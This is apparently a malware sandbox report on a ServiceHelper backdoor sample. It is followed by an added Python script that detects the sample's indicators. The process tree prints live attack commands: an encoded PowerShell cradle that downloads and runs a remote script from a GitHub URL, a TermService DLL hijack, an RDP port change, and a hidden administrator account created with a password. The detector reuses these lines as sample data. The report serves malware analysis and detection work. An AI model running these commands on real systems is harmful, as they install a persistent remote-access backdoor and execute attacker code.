Resubmissions
- 02-09-2021 16:57  210902-vgpzjadhhn  score 10
- 02-09-2021 16:25  210902-tw1h5sage4  score 10
- 02-09-2021 11:31  210902-9dk89x9wb2  score 10
- 14-08-2021 13:56  210814-xdxpv1yk2x  score 10

Analysis
  max time kernel: 1810s
  max time network: 1768s
  platform: windows7_x64
  resource: win7-en
  submitted: 02-09-2021 11:31
Static task: static1
Behavioral task: behavioral1
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win7-en
Behavioral task: behavioral2
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win10-en
General
  Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Size: 5.9MB
  MD5: 472208d7ba18d4c14b7e90b9db5d6feb
  SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
  SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
  SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.
Blocklisted process makes network request (2 IoCs)
  flow 10  pid 1740  powershell.exe
  flow 11  pid 1740  powershell.exe
Modifies RDP port number used by Windows (1 TTP)

Possible privilege escalation attempt (8 IoCs)
  pid 780   icacls.exe
  pid 1000  icacls.exe
  pid 1084  icacls.exe
  pid 1588  icacls.exe
  pid 1212  icacls.exe
  pid 1904  takeown.exe
  pid 1932  icacls.exe
  pid 1960  icacls.exe
Sets DLL path for service in the registry (2 TTPs)

YARA rule matches on dropped resources
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
Loads dropped DLL (2 IoCs)
  pid 1932
  pid 1932

Modifies file permissions (1 TTP, 8 IoCs)
  pid 1588  icacls.exe
  pid 1212  icacls.exe
  pid 1904  takeown.exe
  pid 1932  icacls.exe
  pid 1960  icacls.exe
  pid 780   icacls.exe
  pid 1000  icacls.exe
  pid 1084  icacls.exe
Drops file in System32 directory (1 IoC)
  File created  C:\Windows\system32\rfxvmt.dll  powershell.exe

Drops file in Windows directory (9 IoCs)
  File created                C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File created                C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WVLWSTRPTYRT2K0VAQ3X.temp  powershell.exe
  File created                C:\Windows\branding\mediasvc.png  powershell.exe
  File created                C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
Modifies data under HKEY_USERS (4 IoCs)
(S-1-5-20 is the SID of NT AUTHORITY\NETWORK SERVICE, the account the hijacked TermService runs as.)
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 802e293aee9fd701  powershell.exe

Modifies registry key (1 TTP, 1 IoC)

Runs net.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid 1468  powershell.exe  (4 events)
  pid 1264  powershell.exe
  pid 980   powershell.exe
  pid 1952  powershell.exe
  pid 1740  powershell.exe

Suspicious behavior: LoadsDriver (59 IoCs)
  pid 468   (1 event)
  pid 1932  (58 events)
Suspicious use of AdjustPrivilegeToken (19 IoCs)
  Token: SeDebugPrivilege               pid 1992  472208d7ba18d4c14b7e90b9db5d6feb.exe
  Token: SeDebugPrivilege               pid 1468  powershell.exe
  Token: SeDebugPrivilege               pid 1264  powershell.exe
  Token: SeDebugPrivilege               pid 980   powershell.exe
  Token: SeDebugPrivilege               pid 1952  powershell.exe
  Token: SeRestorePrivilege             pid 1960  icacls.exe
  Token: SeAssignPrimaryTokenPrivilege  pid 1604  WMIC.exe  (2 events)
  Token: SeIncreaseQuotaPrivilege       pid 1604  WMIC.exe  (2 events)
  Token: SeAuditPrivilege               pid 1604  WMIC.exe  (2 events)
  Token: SeAssignPrimaryTokenPrivilege  pid 1568  WMIC.exe  (2 events)
  Token: SeIncreaseQuotaPrivilege       pid 1568  WMIC.exe  (2 events)
  Token: SeAuditPrivilege               pid 1568  WMIC.exe  (2 events)
  Token: SeDebugPrivilege               pid 1740  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Parent PID (process) -> target PID (process); each pair was recorded 3 times unless noted
  1992 472208d7ba18d4c14b7e90b9db5d6feb.exe -> 1468 powershell.exe
  1468 powershell.exe -> 1460 csc.exe
  1460 csc.exe -> 1568 cvtres.exe
  1468 powershell.exe -> 1264 powershell.exe
  1468 powershell.exe -> 980 powershell.exe
  1468 powershell.exe -> 1952 powershell.exe
  1468 powershell.exe -> 1904 takeown.exe
  1468 powershell.exe -> 1932 icacls.exe
  1468 powershell.exe -> 1960 icacls.exe
  1468 powershell.exe -> 780 icacls.exe
  1468 powershell.exe -> 1000 icacls.exe
  1468 powershell.exe -> 1084 icacls.exe
  1468 powershell.exe -> 1588 icacls.exe
  1468 powershell.exe -> 1212 icacls.exe
  1468 powershell.exe -> 1796 reg.exe
  1468 powershell.exe -> 1056 reg.exe
  1468 powershell.exe -> 976 reg.exe
  1468 powershell.exe -> 1164 net.exe
  1164 net.exe -> 1152 net1.exe
  1468 powershell.exe -> 1720 cmd.exe
  1720 cmd.exe -> 1556 cmd.exe
  1556 cmd.exe -> 344 net.exe  (recorded once)
Processes
(Depth in the tree is shown as [n]; the image path, the recorded command line, the flagged behaviours and the PID follow.)

[1] C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe  (PID 1992)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1468)
      cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  (PID 1460)
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_swl6zs3.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe  (PID 1568)
          cmdline: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5774.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5763.tmp"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1264)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 980)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1952)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\takeown.exe  (PID 1904)
        cmdline: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1932)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1960)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe  (PID 780)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1000)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1084)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1588)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe  (PID 1212)
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\reg.exe  (PID 1796)
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        (0x1C21 = 7201 decimal; the RDP listener is moved off the default port 3389.)
    [3] C:\Windows\system32\reg.exe  (PID 1056)
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
        (The stock value is %SystemRoot%\System32\termsrv.dll; TermService is redirected to the dropped UPX-packed file disguised as a PNG.)
    [3] C:\Windows\system32\reg.exe  (PID 976)
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe  (PID 1164)
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe  (PID 1152)
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe  (PID 1720)
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe  (PID 1556)
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe  (PID 344)
            cmdline: net start rdpdr
          [6] C:\Windows\system32\net1.exe  (PID 1692)
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe  (PID 1696)
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe  (PID 1628)
          cmdline: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe  (PID 1752)
            cmdline: net start TermService
          [6] C:\Windows\system32\net1.exe  (PID 1904)
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe  (PID 1012)
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe  (PID 1508)
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe  (PID 1000)
    cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
  [2] C:\Windows\system32\net.exe  (PID 1252)
      cmdline: net.exe user WgaUtilAcc 000000 /del
    [3] C:\Windows\system32\net1.exe  (PID 1712)
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
[1] C:\Windows\System32\cmd.exe  (PID 1384)
    cmdline: cmd /C net.exe user WgaUtilAcc je5MRPej /add
  [2] C:\Windows\system32\net.exe  (PID 1600)
      cmdline: net.exe user WgaUtilAcc je5MRPej /add
    [3] C:\Windows\system32\net1.exe  (PID 976)
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc je5MRPej /add
[1] C:\Windows\System32\cmd.exe  (PID 708)
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  [2] C:\Windows\system32\net.exe  (PID 1508)
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    [3] C:\Windows\system32\net1.exe  (PID 1504)
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe  (PID 616)
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD
  [2] C:\Windows\system32\net.exe  (PID 1364)
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD
    [3] C:\Windows\system32\net1.exe  (PID 1588)
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EMSKOIMQ$ /ADD
[1] C:\Windows\System32\cmd.exe  (PID 1944)
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  [2] C:\Windows\system32\net.exe  (PID 1368)
      cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    [3] C:\Windows\system32\net1.exe  (PID 1460)
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe  (PID 976)
    cmdline: cmd /C net.exe user WgaUtilAcc je5MRPej
  [2] C:\Windows\system32\net.exe  (PID 1392)
      cmdline: net.exe user WgaUtilAcc je5MRPej
    [3] C:\Windows\system32\net1.exe  (PID 344)
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc je5MRPej
[1] C:\Windows\System32\cmd.exe  (PID 1496)
    cmdline: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe  (PID 1604)
      cmdline: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe  (PID 1012)
    cmdline: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe  (PID 1568)
      cmdline: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe  (PID 1556)
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe  (PID 1392)
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1740)
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        (The -enc argument is base64 over UTF-16LE; decoded it reads: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1") , the URL listed under Malware Config.)
        - Blocklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe  (PID 1728)
    cmdline: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
  [2] C:\Windows\system32\net.exe  (PID 2032)
      cmdline: net user wgautilacc 111213
    [3] C:\Windows\system32\net1.exe  (PID 572)
        cmdline: C:\Windows\system32\net1 user wgautilacc 111213
  [2] C:\Windows\system32\net.exe  (PID 1064)
      cmdline: net user wgautilacc /active:yes
    [3] C:\Windows\system32\net1.exe  (PID 1796)
        cmdline: C:\Windows\system32\net1 user wgautilacc /active:yes
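The process tree above is a complete RDP-hijack setup: TermService's ServiceDLL is redirected to a dropped file, the listener port is moved, rfxvmt.dll is planted and re-ACLed, a local account is created and added to Administrators and Remote Desktop Users, and the second stage is pulled with an encoded PowerShell download cradle. The Python below is an added triage example, not code from the sandbox report or from the malware: it decodes PowerShell -enc payloads (base64 over UTF-16LE) and scans a list of command lines for those indicators. The command lines are copied from the tree above; the one legitimate ServiceDLL line is a constructed control that must not be flagged. Indicator tag names, the regexes and the port/path heuristics are this example's own choices.

```python
"""Triage helper for the RDP-hijack process tree in this report (added example)."""
import base64
import re
from collections import defaultdict

# -enc payload copied from the powershell.exe command line in the report.
ENC = ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBu"
       "AGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIA"
       "YwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBz"
       "AHAAZQBlAGQALgBwAHMAMQAiACkA")

# Constructed control: the stock TermService ServiceDLL.  Must NOT be flagged.
BENIGN_SERVICEDLL = (r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService'
                     r'\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrv.dll /f')

# Constructed sample: command lines copied from the process tree, plus the control.
SAMPLE_CMDLINES = [
    r""""powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'""",
    r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll',
    r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'cmd /c net start TermService',
    r'net.exe user WgaUtilAcc je5MRPej /add',
    r'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    r'net user wgautilacc /active:yes',
    'powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc ' + ENC,
    BENIGN_SERVICEDLL,
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are covered.
_ENC_RE = re.compile(r'(?<!\S)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})', re.I)
_URL_RE = re.compile(r'https?://[^\s"\'<>()]+')
_REG_DATA_RE = re.compile(r'/d\s+(?:"([^"]*)"|(\S+))', re.I)   # reg.exe add ... /d <data>


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -enc argument (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text):
    return _URL_RE.findall(text)


def _reg_data(cmdline):
    """The /d data argument of a reg.exe add command, unquoted, or None."""
    m = _REG_DATA_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def scan_cmdline(cmdline):
    """Return the indicator tags a single command line triggers."""
    tags, low, data = [], cmdline.lower(), _reg_data(cmdline)
    # TermService ServiceDLL must stay %SystemRoot%\System32\termsrv.dll.
    if 'termservice\\parameters' in low and 'servicedll' in low and data is not None:
        d = data.lower()
        if not d.endswith('termsrv.dll') or '\\system32\\' not in d:
            tags.append(f'termservice_servicedll_redirect:{data}')
    # RDP listener moved off 3389 (data may be hex like 0x1C21 or decimal).
    if 'winstations\\rdp-tcp' in low and 'portnumber' in low and data is not None:
        try:
            port = int(data, 0)
            if port != 3389:
                tags.append(f'rdp_port_changed:{port}')
        except ValueError:
            pass
    if 'fenablewddmdriver' in low and data == '0':
        tags.append('rdp_wddm_driver_disabled')
    if re.search(r'\brfxvmt\.dll\b', low) and re.search(r'\b(takeown|icacls)(\.exe)?\b', low):
        tags.append('rfxvmt_acl_tamper')
    if re.search(r'\bnet(1|\.exe)?\s+user\s+\S+\s+\S+\s+/add\b', low):
        tags.append('local_account_created')
    if re.search(r'\bnet(1|\.exe)?\s+user\s+\S+\s+/active:yes\b', low):
        tags.append('local_account_enabled')
    m = re.search(r'\blocalgroup\s+"?(administrators|remote desktop users)"?\s+(.+?)\s+/add\b', low)
    if m:
        tags.append(f'privileged_group_add:{m.group(1)}')
    m = re.search(r'\bnet(\.exe)?\s+start\s+(termservice|rdpdr)\b', low)
    if m:
        tags.append(f'rdp_service_start:{m.group(2)}')
    if re.search(r'\bpowershell(\.exe)?\b', low) and re.search(r'(?<!\S)-e(?:p|xecutionpolicy)\s+bypass\b', low):
        tags.append('powershell_execution_policy_bypass')
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append('powershell_encoded_command')
        tags.extend(f'download_url:{u}' for u in extract_urls(decoded))
    return tags


def summarize(cmdlines):
    """Map each indicator tag to the command lines that triggered it."""
    hits = defaultdict(list)
    for c in cmdlines:
        for t in scan_cmdline(c):
            hits[t].append(c)
    return dict(hits)


if __name__ == '__main__':
    for tag, lines in sorted(summarize(SAMPLE_CMDLINES).items()):
        print(f'{tag}  <- {len(lines)} command line(s)')
```

The ServiceDLL rule deliberately keys on the data value rather than on reg.exe itself, so the constructed control (the default termsrv.dll path) produces no tag while the mediasrv.png redirection does; the same shape works on Sysmon event 13 data or EDR command-line telemetry once the fields are extracted.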
Network
MITRE ATT&CK Enterprise v6
Downloads

- MD5: c8b16c230c1ad3bbb280f134682abd9e
  SHA1: 7cde073cacfaa9d2ef5058f43e5d0f7aca0d8a7e
  SHA256: af6c29782b3d6b7594a04f4a7737cfb23b69fbf61f909d2c4fa8271f1b2ecc3c
  SHA512: afb0e0d69b1b08439f5663d5fb98d319a4a772e1a8a18a310be431e18470afb4d6647604895ec6cd10df83279078aede3ae4b558abc7113ca2a32e3574b7f159
- MD5: 50961a1830d28def3a7e30ad5762dda8
  SHA1: 54e9700451f57e22c2fd46d703d7296957474c41
  SHA256: 7bb722f91cac30e7565c7ee5b8f0d3072d43aa6293c2dc5f0e3cf307c4bc0de4
  SHA512: 1a7ecfec2ece36df77bbb9c25257f613a33bb77d5f0cad7b6a4d899f84789952ff7c8d5c34dcfdf2cd2123fbb10a4fd17f1479f2cf8649d395004acb63b6c4e6
- MD5: b8172ddd9582696676507901db9667fb
  SHA1: 519e06b64a09f8686d26b531082cdf8d9edf7e1f
  SHA256: 1946833f1b773ecf66c27f55641743fbd4352059e73e9e22333322b463fd1555
  SHA512: 988cc72b36c6198ebb60bb0164e6f1cde086624f90df1df26147bb808df3ca16ae7a4fb81af80e8728d1504758fd5788c977356994cc8313dee8b7b6d229e2d3
- MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- MD5: 00fb904b2dd958760943b89400e9b7f9
  SHA1: 8c825862b6f70cbaef991525f31100f713e61e7d
  SHA256: 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
  SHA512: ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 6ec0d717f615df538cf71bc3aa75e567
  SHA1: ccac6033efdf2515b8a2ba47280f5cd70ba58cbc
  SHA256: da37ac60b966aa85729e22ce4980bbeda70a08d744c36b1c1feec61005449532
  SHA512: 5014b53d7b8b7c1d4816e3ef4970e9b4717b0a54c9c3cc42b9a6aef34f30ac30b61b8ff2db96d56771bee8c6349908ece9526604244aae318694c6cc106411d9
- MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
- MD5: d41d8cd98f00b204e9800998ecf8427e  (digests of a zero-byte file; this entry carries no content)
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- MD5: e70da655bc6dd19d08882b761d5e2aa0
  SHA1: 2041650e90f141ed98959b3b3cd80cf18f153896
  SHA256: 8964179b560f453ee2fba0cb349d1d68c0fa7bbfbaf82575ea39b90bb66591e1
  SHA512: 5114f89cb3189b0c2dbe95e0a1390d760ed99aa2b9f69bca8b3d3d7d9f4bd7013be95c44041d897346d380b2747be094ca45b472c63e826172a03a2879f275bd
- MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- MD5: 3f4f11f6b142f70715b38b41d6a95b93
  SHA1: fd06fdc0d8f5eae8183660862a7880d4ac790183
  SHA256: 52bd4baa90d34800e5818f975a26866b60f9c67630b5424e05af38c9980107cb
  SHA512: 3af14a128a5896150ce93aed20768b65e3ef721dd53eea114194293ef13fcde9b6336496d5bc6514038785afc1ac11641d63f9a8132e00b5bef7ee077b5890ae
- MD5: b110f38845e18a04ab59a7d8a134ef40
